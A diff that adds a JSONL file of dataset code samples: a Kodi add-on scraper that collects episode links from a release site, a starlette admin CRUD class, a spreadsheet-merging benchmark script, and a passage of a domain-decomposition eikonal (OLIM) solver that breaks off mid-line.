diff --git "a/2676.jsonl" "b/2676.jsonl" new file mode 100644--- /dev/null +++ "b/2676.jsonl" @@ -0,0 +1,713 @@ +{"seq_id":"620050439","text":"# -*- coding: utf-8 -*-\r\n\r\n'''\r\n Incursion Add-on\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n'''\r\n\r\nimport requests, re\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass source:\r\n def __init__(self):\r\n self.priority = 1\r\n self.language = ['en']\r\n self.domain = 'http://rlsscn.in/'\r\n self.base_link = 'http://rlsscn.in/'\r\n self.search_link = '/?s=%s'\r\n\r\n def movie(self, imdb, title, localtitle, aliases, year):\r\n try:\r\n url = {'imdb': imdb, 'title': title, 'localtitle': localtitle, 'aliases': aliases, 'year': year}\r\n except:\r\n return\r\n\r\n def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):\r\n try:\r\n url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}\r\n return url\r\n except:\r\n return\r\n\r\n def episode(self, url, imdb, tvdb, title, premiered, season, episode):\r\n try:\r\n\r\n url['episode'] = episode\r\n url['season'] = season\r\n return url\r\n except:\r\n return\r\n\r\n def sources(self, url, hostDict, hostprDict):\r\n\r\n hostDict = hostDict + hostprDict\r\n\r\n sources = []\r\n season = url['season']\r\n episode = url['episode']\r\n if len(season) == 1:\r\n season = '0' + season\r\n if len(episode) == 1:\r\n episode = '0' + episode\r\n\r\n request =('%s+s%se%s' % (url['tvshowtitle'], season, episode)).replace(\" \", \"+\")\r\n request = self.base_link + self.search_link % request\r\n request = requests.get(request)\r\n\r\n soup = BeautifulSoup(request.text, 'html.parser')\r\n soup = soup.find('h2', {'class':'title'})\r\n request = soup.find('a')['href']\r\n request = requests.get(request)\r\n soup = BeautifulSoup(request.text, 'html.parser')\r\n soup = soup.find('div', {'id':'content'})\r\n soup = soup.find_all('a', {'class':'autohyperlink'})\r\n source_list = []\r\n\r\n for i in soup:\r\n for h in hostDict:\r\n if h in i['href']:\r\n if not '.rar' in i['href']:\r\n source_list.append(i['href'])\r\n for i in source_list:\r\n host = i.replace('www.', '')\r\n host = re.findall(r'://(.*?)\\..*?/', host)[0]\r\n\r\n if '1080p' in i:\r\n quality = '1080p'\r\n elif '720p' in i:\r\n quality = '720p'\r\n else:\r\n quality = 'SD'\r\n\r\n info = ''\r\n sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': i, 'info': info,\r\n 'direct': False, 'debridonly': True})\r\n\r\n return sources\r\n\r\n\r\n\r\n def resolve(self, url):\r\n return url\r\n","sub_path":"lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/rlsscn.py","file_name":"rlsscn.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"514640831","text":"import sqlalchemy as sa\nfrom sqlalchemy.sql.selectable import Select\nfrom starlette.exceptions import HTTPException\nfrom starlette_core.database import 
database\n\nfrom starlette_admin.admin import BaseAdmin\n\n\nclass ModelAdmin(BaseAdmin):\n \"\"\" The base admin class for sqlalchemy crud operations. \"\"\"\n\n model_class: sa.Table\n object_str_function = lambda self: self[\"id\"]\n\n @classmethod\n def get_default_ordering(cls, qs: Select) -> Select:\n return qs.order_by(\"id\")\n\n @classmethod\n def get_search_results(cls, qs: Select, term: str) -> Select:\n raise NotImplementedError()\n\n @classmethod\n def get_ordered_results(\n cls, qs: Select, order_by: str, order_direction: str\n ) -> Select:\n if order_by and order_direction and hasattr(cls.model_class.c, order_by):\n field = getattr(cls.model_class.c, order_by)\n if order_direction == \"desc\":\n qs = qs.order_by(field.desc())\n else:\n qs = qs.order_by(field)\n return qs\n\n @classmethod\n async def get_list_objects(cls, request):\n qs = cls.model_class.select()\n\n # if enabled, call `cls.get_search_results`\n search = request.query_params.get(\"search\", \"\").strip().lower()\n if cls.search_enabled and search:\n qs = cls.get_search_results(qs, search)\n\n # if enabled, sort the results\n order_by = request.query_params.get(\"order_by\")\n order_direction = request.query_params.get(\"order_direction\")\n if cls.order_enabled and order_by and order_direction:\n qs = cls.get_ordered_results(qs, order_by, order_direction)\n else:\n qs = cls.get_default_ordering(qs)\n\n return await database.fetch_all(qs)\n\n @classmethod\n async def get_object(cls, request):\n id = request.path_params[\"id\"]\n qs = cls.model_class.select().where(cls.model_class.c.id == id)\n obj = await database.fetch_one(qs)\n if not obj:\n raise HTTPException(404)\n obj.__class__.__str__ = cls.object_str_function\n return obj\n\n @classmethod\n async def do_create(cls, form, request):\n qs = cls.model_class.insert().values(**form.data)\n return await database.execute(qs)\n\n @classmethod\n async def do_delete(cls, instance, form, request):\n qs = cls.model_class.delete().where(cls.model_class.c.id == instance[\"id\"])\n await database.execute(qs)\n\n @classmethod\n async def do_update(cls, instance, form, request):\n qs = (\n cls.model_class.update()\n .where(cls.model_class.c.id == instance[\"id\"])\n .values(**form.data)\n )\n return await database.execute(qs)\n","sub_path":"starlette_admin/admin/model_admin.py","file_name":"model_admin.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"601201341","text":"import warnings\nwarnings.simplefilter('ignore')\n\nimport shutil\nimport os\nimport time\nimport subprocess\nimport sys\nimport pandas as pd\n\ndef main():\n df_list=[]\n sg_list=[f\"SG{i}\" for i in range(1,231)]\n \n for sg in sg_list:\n if not os.path.exists(f\"out_benchmark_{sg}.xls\"):\n continue\n df_list.append(pd.read_excel(f\"out_benchmark_{sg}.xls\", index_col=0))\n\n for i, df_pd in enumerate(df_list):\n if i == 0:\n df_all= pd.DataFrame(columns=df_pd.columns)\n for j in range(len(df_pd)):\n df_all=df_all.append(df_pd.iloc[j], ignore_index=True)\n else:\n for j in range(len(df_pd)):\n df_all=df_all.append(df_pd.iloc[j], ignore_index=True)\n \n #df_all=df_all.reset_index(drop=True)\n df_all.to_excel(f\"out_benchmark_SG_all.xls\")\n \nif __name__ == \"__main__\":\n 
main()\n","sub_path":"benchmarks/03scailing_benchmark/bench_combine_xsl.py","file_name":"bench_combine_xsl.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"411395145","text":"import functools\nimport itertools\nimport numpy as np\nimport rtree\n\nfrom scipy.optimize import brentq\nfrom scipy.sparse import dok_matrix\nfrom scipy.spatial import Delaunay\nfrom scipy.spatial import cKDTree as KDTree\n\nimport constants\nimport interp\nimport ma\nimport pyolim\n\nfrom sparse_olim import get_boundary_layer_points\nfrom sparse_olim import get_stencils\nfrom sparse_olim import HeapNode\nfrom sparse_olim import SparseOlim2\n\nfrom surf import EmptySurf\nfrom surf import get_vertices\n\n_offsets = np.array([\n offset for offset in\n itertools.product(range(-1, 2), range(-1, 2))\n])\n\ndef _get_box(shape, ind):\n inds = np.array(ind) + _offsets\n return [tuple(ind_) for ind_ in inds if ma.is_inbounds(shape, ind_)]\n\n_tol = constants.TOL\n\ndef get_min(olim):\n if isinstance(olim, SparseOlim2):\n heap_node = olim.min()\n if heap_node is None:\n return heap_node\n else:\n return heap_node.U, heap_node.ind\n else:\n return olim.min()\n\ndef select(olims):\n U, argmin = np.inf, None\n for i, olim in enumerate(olims):\n if get_min(olim) is not None:\n U_min, _ = get_min(olim)\n if U_min < U:\n U, argmin = U_min, i\n return argmin\n\n\n@functools.singledispatch\ndef get_state(olim, ind):\n fmt = 'no implementation of `get_state` for type %s'\n raise Exception(fmt % type(olim))\n\n@get_state.register\ndef _(olim: pyolim.Olim, ind):\n i = [b'', b'\\x01', b'\\x02', b'\\x03'].index(olim.state[ind])\n return pyolim.State(i)\n\n@get_state.register\ndef _(olim: SparseOlim2, ind):\n return pyolim.State(olim.state[ind])\n\ndef is_boundary(olim, ind):\n return get_state(olim, ind) == pyolim.State.BOUNDARY\n\ndef is_trial(olim, ind):\n return get_state(olim, ind) == pyolim.State.TRIAL\n\ndef is_far(olim, ind):\n return get_state(olim, ind) == pyolim.STATE.FAR\n\ndef is_valid(olim, ind):\n return get_state(olim, ind) == pyolim.STATE.VALID\n\n\n@functools.singledispatch\ndef get_updated_ghost_inds(olim, ghost_inds, changed, ind):\n fmt = 'no implementation of `get_updated_ghost_inds` for type %s'\n raise Exception(fmt % type(olim))\n\n@get_updated_ghost_inds.register\ndef _(olim: pyolim.Olim, ghost_inds, changed, ind):\n shape = olim.shape\n box = _get_box(shape, ind)\n return [\n ind_ for ind_ in box\n if changed[ind_] and ind_ in ghost_inds[olim]\n ]\n\n@get_updated_ghost_inds.register\ndef _(olim: SparseOlim2, ghost_inds, changed, ind):\n return [\n i\n for i in np.where(changed)[0]\n if i in ghost_inds[olim]\n ]\n\n\n@functools.singledispatch\ndef get_ind_from_heap_node(node):\n fmt = 'no implementation of `get_ind_from_heap_node` for type %s'\n raise Exception(fmt % type(node))\n\n@get_ind_from_heap_node.register\ndef _(node: tuple):\n return node[1]\n\n@get_ind_from_heap_node.register\ndef _(node: HeapNode):\n return node.ind\n\n\n@functools.singledispatch\ndef are_neighbors(olim, ind1, ind2):\n fmt = 'no implementation of `are_neighbors` for type %s'\n raise Exception(fmt % type(node))\n\n@are_neighbors.register\ndef _(olim: pyolim.Olim, ind1, ind2):\n raise Exception('TODO: implement `are_neighbors` for `pyolim.Olim`')\n\n@are_neighbors.register\ndef _(olim: SparseOlim2, ind1, ind2):\n return ind1 in olim.nbs[ind2]\n\n\n@functools.singledispatch\ndef prioritize_heap_node(olim, ind):\n fmt = 'no implementation of 
`get_ind_from_heap_node` for type %s'\n raise Exception(fmt % type(node))\n\n@prioritize_heap_node.register\ndef _(olim: pyolim.Olim, ind):\n raise Exception('TODO: implement `prioritize_heap_node` for `pyolim.Olim`')\n\n@prioritize_heap_node.register\ndef _(olim: SparseOlim2, ind):\n i = next(\n i for i, node in enumerate(olim.heap)\n if node.ind == ind\n )\n if i is None:\n raise Exception(\"node with index %s doesn't exist in heap\" % (ind,))\n level = int(np.log2(i + 1)) # TODO: remove this\n ind0 = olim.heap[0].ind\n if are_neighbors(olim, ind, ind0):\n U_0 = olim.heap[0].U\n U_i = olim.heap[i].U\n if abs(U_0 - U_i) > _tol:\n raise Exception('|%s - %s| > %s' % (U_0, U_i, _tol))\n olim.heap[0], olim.heap[i] = olim.heap[i], olim.heap[0]\n\n\n@functools.singledispatch\ndef get_minimizer(olim, ind):\n fmt = 'no implementation of `get_minimizer` for type %s'\n raise Exception(fmt % type(olim))\n\n@get_minimizer.register\ndef _(olim: pyolim.Olim, ind):\n if is_boundary(olim, ind):\n raise Exception(\"can't get minimizer of boundary node\")\n\n line_inds = ma.get_plausible_line_inds(olim, ind)\n tri_ind_pairs = ma.get_plausible_tri_inds(olim, ind)\n tri_inds = ma.get_incident_inds(tri_ind_pairs)\n\n U_min = np.inf\n arg0, arg1, arglam = None, None, None\n\n for ind0 in line_inds:\n if ind0 in tri_inds:\n continue\n U = ma.line(olim, ind, ind0)\n if U < U_min:\n U_min, arg0 = U, ind0\n\n for ind0, ind1 in tri_ind_pairs:\n U, lam = ma.tri(olim, ind, ind0, ind1)\n if U < U_min:\n U_min, arg0, arg1, arglam = U, ind0, ind1, lam\n\n return U_min, arg0, arg1, arglam\n\n\n@get_minimizer.register\ndef _(olim: SparseOlim2, ind):\n if is_boundary(olim, ind):\n raise Exception(\"can't get minimizer of boundary node\")\n\n U_min = np.inf\n arg0, arg1, arglam = None, None, None\n\n for ind0 in olim.nbs[ind]:\n if ind0 in olim.tris[ind]:\n continue\n U = olim.line(ind, ind0)\n if U < U_min:\n U_min, arg0 = U, ind0\n\n for ind0, ind1 in olim.tris[ind]:\n U, lam = olim.tri(ind, ind0, ind1)\n if U < U_min:\n U_min, arg0, arg1, arglam = U, ind0, ind1, lam\n\n return U_min, arg0, arg1, arglam\n\n\n@functools.singledispatch\ndef add_src(olim, ind, U, virtual=False):\n fmt = 'no implementation of `add_src` for type %s'\n raise Exception(fmt % type(olim))\n\n@add_src.register\ndef _(olim: pyolim.Olim, ind, U, virtual=False):\n olim.add_src(ind, U)\n\n@add_src.register\ndef _(olim: SparseOlim2, ind, U, virtual=False):\n olim.add_src(ind, U, virtual)\n\n\ndef step(olims, other_olim, ghost_inds, check_consistency=False, verbose=False):\n '''TODO: add some docs'''\n\n early_prio, late_prio = False, False\n\n # First, select the next OLIM to step. Return if the decomposed\n # problem is solved\n i = select(olims)\n if i is None:\n return None\n if verbose:\n print('updating olim%d:' % (i + 1))\n\n # Set up some variables\n selected_index = i # in case we overwrite i\n olim, olim_ = olims[i], other_olim[olims[i]]\n\n # When updating a ghost node, note that there may be multiple\n # minima in the other OLIM's front. 
If this happens, we swap the\n # desired node to the front of the OLIM so that when we update\n # each OLIM, we update ghost nodes that correspond with one\n # another.\n ind = get_ind_from_heap_node(olim.min())\n if ind in ghost_inds[olim]:\n ind_ = get_ind_from_heap_node(olim_.min())\n if ind_ != ghost_inds[olim][ind]:\n target = ghost_inds[olim][ind]\n print('early prioritization')\n early_prio = True\n prioritize_heap_node(olim_, target)\n\n # Do a quick consistency check and make sure that if we're\n # updating a ghost node, we'll be updating the correct ghost node\n # in the other OLIM\n U, ind = get_min(olim)\n if ind in ghost_inds[olim]:\n U_, ind_ = get_min(olim_)\n if ghost_inds[olim][ind] != ind_:\n raise Exception('ghost_inds[olim][%s] == %s != %s' % (\n ind, ghost_inds[olim][ind], ind_\n ))\n if abs(U - U_) > _tol:\n raise Exception('|%s - %s| > %s' % (U, U_, _tol))\n\n # Get a view of the OLIM-to-be-updated before we step it\n # forward---we need it to check and see which ghost nodes were\n # changed\n prev_U = olim.U.copy() # very bad!\n\n # Step the OLIM, and find the indices of the ghost nodes of the\n # OLIM-to-be-updated that have been modified after stepping\n ind = olim.step()\n updated_ind = ind # to return (mainly for plotting)\n updated_ghost_inds = get_updated_ghost_inds(\n olim, ghost_inds, olim.U != prev_U, ind\n )\n\n # Adjust the values of the updated ghost nodes in the other OLIM\n # (thereby fixing their position in the heap). There may be nodes\n # that aren't TRIAL yet---\"add a source\" to deal with those\n if len(updated_ghost_inds) > 0:\n if verbose:\n print('synchronizing: adjusting nodes in other olim')\n for updated_ghost_ind in updated_ghost_inds:\n ind_ = ghost_inds[olim][updated_ghost_ind]\n U_ghost = olim.U[updated_ghost_ind]\n assert U_ghost >= U\n if get_state(olim_, ind_) == pyolim.State.TRIAL:\n olim_.adjust(ind_, U_ghost)\n else:\n add_src(olim_, ind_, U_ghost, virtual=True)\n U_ghost_ = olim_.U[ind_]\n assert U_ghost == U_ghost_\n\n if ind in ghost_inds[olim]:\n if verbose:\n print('synchronizing: stepping `olim_`')\n prev_U_ = olim_.U.copy() # very bad!\n\n # It can happen that there are multiple minima in the\n # front. 
When this happens, we need to make sure we pull out\n # the one which matches `ind`.\n # ind_ = olim_.step()\n ind_ = get_ind_from_heap_node(olim_.min())\n # If they don't agree, we pull the right node out of the heap\n if ind_ != ghost_inds[olim][ind]:\n target = ghost_inds[olim][ind]\n print('late prioritization')\n late_prio = True\n prioritize_heap_node(olim_, target)\n ind_ = olim_.step()\n\n if ind_ != ghost_inds[olim][ind]:\n raise Exception(\n 'new valid node in `olim` != new valid node in `olim_`')\n if abs(olim.U[ind] - olim_.U[ind_]) > _tol:\n raise Exception('|%s - %s| > %s' % (\n olim.U[ind], olim_.U[ind_], _tol\n ))\n if verbose:\n print('synchronizing: adjusting nodes in `olim`')\n changed_ = olim_.U != prev_U_\n updated_ghost_inds_ = get_updated_ghost_inds(\n olim_, ghost_inds, changed_, ind_)\n if verbose:\n print('- olim%d, heap ind = %s, updated ghost inds = %s' % (\n 2 - i, ind_, updated_ghost_inds_))\n for updated_ghost_ind_ in updated_ghost_inds_:\n updated_ghost_ind__ = ghost_inds[olim_][updated_ghost_ind_]\n if verbose:\n print(' + updating ghost nodes %s & %s' % (\n updated_ghost_ind_, updated_ghost_ind__))\n U_min = min(olim.U[updated_ghost_ind__], olim_.U[updated_ghost_ind_])\n olim.adjust(updated_ghost_ind__, U_min)\n olim_.adjust(updated_ghost_ind_, U_min)\n if olim.U[updated_ghost_ind__] != olim_.U[updated_ghost_ind_]:\n raise Exception(\"values aren't equal after adjustment across bd\")\n\n # Check that the domain's ghost layers are consistent\n if check_consistency:\n # Check that corresponding ghost nodes have the same value\n errors = [\n 0.0 if np.isinf(olim.U[ind]) and np.isinf(olim_.U[ind_])\n else np.abs(olim.U[ind] - olim_.U[ind_])\n for ind, ind_ in ghost_inds[olim].items()\n ]\n if any(e > _tol for e in errors):\n print(errors)\n raise Exception('ghost layers are inconsistent')\n # ... and that they have the same state\n states = [\n (get_state(olim, ind), get_state(olim_, ind_))\n for ind, ind_ in ghost_inds[olim].items()\n ]\n for state1, state2 in states:\n if state1 != state2:\n print(states)\n raise Exception('ghost layers are inconsistent')\n\n return selected_index, updated_ind\n\ndef solve(*args, **kwargs):\n results = step(*args, **kwargs)\n while results is not None:\n results = step(*args, **kwargs)\n\nclass SimpleDomainDecomposition(object):\n '''A class encapsulating a basic domain decomposition algorithm where\n the \"ambient domain\" is a rectangular, equispaced grid, and the\n boundary is specified by a *single* implicit surface, derived from\n BaseSurf (note that this still allows for a complex boundary built\n up through CSG operations on implicit surfaces). 
The limitation of\n this class (why it is \"Simple\") is that it only decomposes the\n domain into *two* pieces---an interior domain consisting only of\n nodes lying on the equispaced grid, and a boundary layer domain\n which includes nodes that lie on the surface of the boundary, and\n most likely need to be handled using an unstructured OLIM.\n\n '''\n def __init__(self, grid, surf, slowness, shadow=False):\n self.grid = grid\n self.surf = surf\n self.slowness = slowness\n self.shadow = shadow\n\n if self.shadow:\n self._olim = SimpleDomainDecomposition(\n grid, surf, slowness, shadow=False\n )\n self._empty_surf = EmptySurf()\n self._shadow_tol = (self.h*np.log(1/self.h))**2\n\n # Find the nodes that will belong to the boundary layer,\n # including a layer of ghost nodes which will overlap with a\n # corresponding layer of ghost nodes in the \"interior\" of the\n # domain (i.e., the part of the domain away from the boundary)\n self.boundary_layer_points = get_boundary_layer_points(\n self.surf,\n self.h,\n self.grid\n )\n self._boundary_layer_kdtree = KDTree(self.boundary_layer_points)\n if self.shadow:\n new_points = []\n for ind in zip(*np.where(self.phi(*self.grid.Xs) < 0)):\n point = self.grid[ind]\n dist, _ = self._boundary_layer_kdtree.query(point)\n if dist < _tol:\n continue\n if dist < 1.5*self.h + _tol:\n new_points.append(point)\n self.boundary_layer_points = np.row_stack([\n self.boundary_layer_points,\n new_points\n ])\n\n # Compute the stencils (the line updates and triangle updates\n # for each node) that will be used by the boundary layer OLIM\n self.boundary_layer_stencil = get_stencils(\n self._empty_surf if self.shadow else self.surf,\n self.boundary_layer_points,\n self.h\n )\n\n # Finally, initialize the boundary layer solver itself\n self.boundary_layer_olim = SparseOlim2(\n self.boundary_layer_points,\n *self.boundary_layer_stencil,\n self.slowness(*self.boundary_layer_points.T)\n )\n\n # Next, get the boundary layer nodes that are grid-aligned. 
We\n # need these to determine the interior OLIM's nodes that\n # should have `boundary` state, as well as to correctly set up\n # the ghost node bimap\n inds, where = self.grid.get_indices_of_grid_aligned_points(\n self.boundary_layer_points\n )\n\n # Determine the nodes of the interior OLIM that will have\n # `boundary` state\n interior_boundary = dok_matrix(self.shape, dtype=bool)\n for ind in inds:\n interior_boundary[ind] = True\n if not self.shadow:\n for ind in zip(*np.where(self.phi(*self.grid.Xs) <= 0)):\n interior_boundary[ind] = True\n interior_boundary = ma.erode(interior_boundary)\n\n # Set up one direction of the ghost node bimap (i.e., the\n # bimap which will allow us to map back and forth between\n # ghost nodes in either the boundary layer OLIM or the\n # interior OLIM\n self.interior_to_boundary_layer = {\n ind: i\n for i, ind in zip(where, inds)\n if ind not in interior_boundary\n }\n\n # A quick sanity check---just make sure that the bimap is set\n # up correctly!\n for ind, i in self.interior_to_boundary_layer.items():\n p = self.boundary_layer_points[i, :]\n q = self.grid[ind]\n error = np.linalg.norm(p - q)\n if error > _tol:\n raise Exception('|%s - %s| = %s > %s' % (p, q, error, _tol))\n ind_ = (p - self.grid.xmin)/self.h\n ind_err = np.linalg.norm(ind - ind_)\n if ind_err > _tol:\n raise Exception('|err| = %s > %s' % (ind_err, _tol))\n\n # To complete the bimap, just create another map with the keys\n # and indices reversed\n self.boundary_layer_to_interior = {\n i: ind\n for ind, i in self.interior_to_boundary_layer.items()\n }\n\n # Now, set up the interior OLIM, setting the state of boundary\n # nodes after initializing it\n self.interior_olim = pyolim.Olim(\n pyolim.Neighborhood.OLIM8, # hardcoded for now\n pyolim.Quadrature.MP0, # hardcoded for now\n self.slowness(*self.grid.Xs),\n self.h\n )\n for ind in interior_boundary.keys():\n if ind in self.interior_to_boundary_layer:\n raise Exception('%s is already a ghost node' % (ind,))\n self.interior_olim.add_bd(ind)\n\n # Set up the three variables (`_olim`, `_other_olim`,\n # `_ghost_inds`) required by the `step` and `solve` functions\n # that run the domain decomposition solver (defined in this\n # module)\n self._olims = [\n self.interior_olim,\n self.boundary_layer_olim\n ]\n self._other_olim = {\n self.interior_olim: self.boundary_layer_olim,\n self.boundary_layer_olim: self.interior_olim\n }\n self._ghost_inds = {\n self.interior_olim: self.interior_to_boundary_layer,\n self.boundary_layer_olim: self.boundary_layer_to_interior\n }\n\n # Set some variables that back properties (defined below)\n # initially to `None` here---the values of these variables are\n # read-only, and computed and memoized on first use\n self.__nonghost_interior_points = None\n self.__nonghost_interior_point_indices = None\n self._points = None\n self._src_inds = None\n\n # TODO: this variable is used by a few other classes. It isn't\n # great that we are storing this, but we'll figure out a\n # better way to do this later.\n self._nonghost_linear_inds = np.empty(self.shape, dtype=int)\n self._nonghost_linear_inds[...] 
= -1\n for i, ind in enumerate(self._nonghost_interior_point_indices):\n self._nonghost_linear_inds[tuple(ind)] = i\n\n # Set up a dictionary of backpointers from vertices in S to \n # boundary layer points\n self._vert_ind_to_bl_ind = dict()\n for i, p in enumerate(self.surf.vertices):\n j = np.argmin(np.sum((self.boundary_layer_points - p)**2, axis=1))\n assert np.linalg.norm(self.boundary_layer_points[j] - p) < _tol\n self._vert_ind_to_bl_ind[i] = int(j)\n\n @property\n def grid(self):\n return self._grid\n\n @property\n def phi(self):\n return self.surf.phi\n\n # TODO: probably best to just remove this entirely... We don't\n # want to change `grid` after initializing an instance of this\n # class\n @grid.setter\n def grid(self, G):\n # TODO: check that G is equispaced...\n self._grid = G\n\n @property\n def shape(self):\n return self.grid.shape\n\n @property\n def h(self):\n return self.grid.h\n\n @property\n def src_inds(self):\n if self._src_inds is None:\n self._src_inds = []\n return self._src_inds\n\n def add_boundary_layer_source(self, ind, U=0.0):\n if ind in self.boundary_layer_to_interior:\n raise Exception('''adding boundary layer sources that coincide\nwith ghost nodes is unsupported for now''')\n self.boundary_layer_olim.add_src(ind, U)\n self.src_inds.append(ind)\n # TODO: this is awful... we really don't want to have to do\n # this!\n if self.shadow:\n self._olim.add_boundary_layer_source(ind, U)\n\n def add_interior_source(self, ind, U=0.0):\n if ind in self.interior_to_boundary_layer:\n raise Exception('''adding interior sources that coincide with\nghost nodes is unsupported for now''')\n self.interior_olim.add_src(ind, U)\n self.src_inds.append(ind)\n if self.shadow:\n self._olim.add_interior_source(ind, U)\n\n def add_sources(self, inds, Us=None):\n if Us is not None:\n assert len(Us) == len(inds)\n for ind, U in zip(inds, Us):\n if isinstance(ind, tuple):\n self.add_interior_source(ind, U)\n else:\n if not isinstance(ind, int):\n import pdb; pdb.set_trace()\n assert isinstance(ind, int)\n self.add_boundary_layer_source(ind, U)\n else:\n for ind in inds:\n if isinstance(ind, tuple):\n self.add_interior_source(ind)\n else:\n assert isinstance(ind, int)\n self.add_boundary_layer_source(ind)\n\n def step(self, check_consistency=False, verbose=False):\n return step(\n self._olims,\n self._other_olim,\n self._ghost_inds,\n check_consistency=check_consistency,\n verbose=verbose\n )\n\n def solve(self, check_consistency=False, verbose=False):\n _ = self.step(check_consistency, verbose)\n while _ is not None:\n _ = self.step(check_consistency, verbose)\n if self.shadow:\n self._olim.solve(check_consistency, verbose)\n\n def _compute_nonghost_interior_points_and_indices(self):\n indices, points = [], []\n if self.shadow:\n extra_indices, extra_points = [], []\n for ind, p in zip(\n self.grid.get_indices(),\n self.grid.get_points()\n ):\n if ind in self.interior_to_boundary_layer:\n continue\n if self.interior_olim.state[ind] == b'\\x03':\n continue\n if self.phi(*p) <= 0:\n if self.shadow:\n extra_indices.append(ind)\n extra_points.append(p)\n continue\n indices.append(ind)\n points.append(p)\n if self.shadow:\n indices.extend(extra_indices)\n points.extend(extra_points)\n self.__nonghost_interior_point_indices = np.array(indices)\n self.__nonghost_interior_points = np.array(points)\n\n @property\n def _nonghost_interior_point_indices(self):\n if self.__nonghost_interior_point_indices is None:\n self._compute_nonghost_interior_points_and_indices()\n return 
self.__nonghost_interior_point_indices\n\n @property\n def _nonghost_interior_points(self):\n if self.__nonghost_interior_points is None:\n self._compute_nonghost_interior_points_and_indices()\n return self.__nonghost_interior_points\n\n @property\n def points(self):\n if self._points is None:\n self._points = np.row_stack([\n self._nonghost_interior_points,\n self.boundary_layer_points\n ])\n return self._points\n\n @property\n def size(self):\n return self.points.shape[0]\n\n @property\n def ndim(self):\n return self.points.shape[1]\n\n def _get_values(self):\n if not self.shadow:\n n = self._nonghost_interior_points.shape[0]\n return np.array([\n self.interior_olim.U[\n tuple(self._nonghost_interior_point_indices[i])\n ]\n if i < n else self.boundary_layer_olim.U[i - n]\n for i in range(self.size)\n ])\n else:\n n1 = self._olim._nonghost_interior_points.shape[0]\n n2 = len(self._olim.boundary_layer_olim)\n def get_Z(U, U_direct):\n # return 1.0 if U - U_direct > self._shadow_tol else 0.0\n return float(U - U_direct > self.h**2)\n return np.concatenate([\n np.array([\n get_Z(\n self._olim.interior_olim.U[\n tuple(self._olim._nonghost_interior_point_indices[i])\n ],\n self.interior_olim.U[\n tuple(self._nonghost_interior_point_indices[i])\n ]\n )\n for i in range(n1)\n ]),\n np.array([\n get_Z(\n self._olim.boundary_layer_olim.U[i],\n self.boundary_layer_olim.U[i]\n )\n for i in range(n2)\n ])\n ])\n\n def get_nearest_neighbor_interpolator(self, ignore_surface=False):\n interpolator = interp.NearestNeighborInterpolator(\n self._olim.points if self.shadow else self.points,\n self._get_values()\n )\n return np.vectorize(\n interpolator if ignore_surface else\n lambda *x: np.nan if self.phi(*x) + _tol <= 0 else interpolator(*x)\n )\n\n class BilinearInterpolator(object):\n\n def __init__(self, olimdd):\n self._olimdd = olimdd\n self._U = self._olimdd.boundary_layer_olim.U\n self._P = olimdd.boundary_layer_points\n\n self._triangulation = Delaunay(self._P)\n self._F = self._triangulation.simplices\n\n # Build RTree for looking up triangles used for interpolation\n self._rtree = rtree.index.Index()\n for i, f in enumerate(self._F):\n P = self._P[f]\n bbox = (*np.min(P, axis=0), *np.max(P, axis=0))\n self._rtree.insert(i, bbox)\n\n def _get_bary_coords(self, p, i):\n p0, p1, p2 = self._P[self._F[i]]\n return np.linalg.solve(np.column_stack([p1 - p0, p2 - p0]), p - p0)\n\n def _valid_bary_coords(self, lam):\n return np.all(lam >= -_tol) and np.sum(lam) <= 1 + _tol\n\n def _tri_interp(self, p, i, lam):\n U0 = self._U[self._F[i, 0]]\n dU = np.array([self._U[j] for j in self._F[i, 1:]]) - U0\n return U0 + dU@lam\n\n def _get_intersected_tri_inds(self, p):\n return self._rtree.intersection((p[0], p[1], p[0], p[1]))\n\n def _interp_boundary_layer(self, *p):\n for i in self._get_intersected_tri_inds(p):\n lam = self._get_bary_coords(p, i)\n if self._valid_bary_coords(lam):\n return self._tri_interp(p, i, lam)\n assert False\n\n def _interp_interior(self, *p):\n # Well, this is ugly! 
There's probably a nicer way to\n # write this\n G = self._olimdd.grid\n points = self._olimdd.grid.get_nearest_points(p)\n x, y = p\n xs, ys = (np.unique(coords) for coords in points.T)\n if len(xs) == 1 and len(ys) == 1:\n return self._olimdd.interior_olim.U[\n tuple(G.get_nearest_ind(*p))\n ]\n elif len(xs) == 1:\n ymin, ymax = ys\n ty = (y - ymin)/(ymax - ymin)\n i = int(G.get_ind_along_axis(xs[0], 0))\n jmin = int(G.get_ind_along_axis(ymin, 1))\n jmax = int(G.get_ind_along_axis(ymax, 1))\n U0 = self._olimdd.interior_olim.U[i, jmin]\n U1 = self._olimdd.interior_olim.U[i, jmax]\n return (1 - ty)*U0 + ty*U1\n elif len(ys) == 1:\n xmin, xmax = xs\n tx = (x - xmin)/(xmax - xmin)\n imin = int(G.get_ind_along_axis(xmin, 0))\n imax = int(G.get_ind_along_axis(xmax, 0))\n j = int(G.get_ind_along_axis(ys[0], 1))\n U0 = self._olimdd.interior_olim.U[imin, j]\n U1 = self._olimdd.interior_olim.U[imax, j]\n return (1 - tx)*U0 + tx*U1\n else:\n xmin, xmax = xs\n ymin, ymax = ys\n tx = (x - xmin)/(xmax - xmin)\n ty = (y - ymin)/(ymax - ymin)\n imin = int(G.get_ind_along_axis(xmin, 0))\n imax = int(G.get_ind_along_axis(xmax, 0))\n jmin = int(G.get_ind_along_axis(ymin, 1))\n jmax = int(G.get_ind_along_axis(ymax, 1))\n U00 = self._olimdd.interior_olim.U[imin, jmin]\n U10 = self._olimdd.interior_olim.U[imax, jmin]\n U01 = self._olimdd.interior_olim.U[imin, 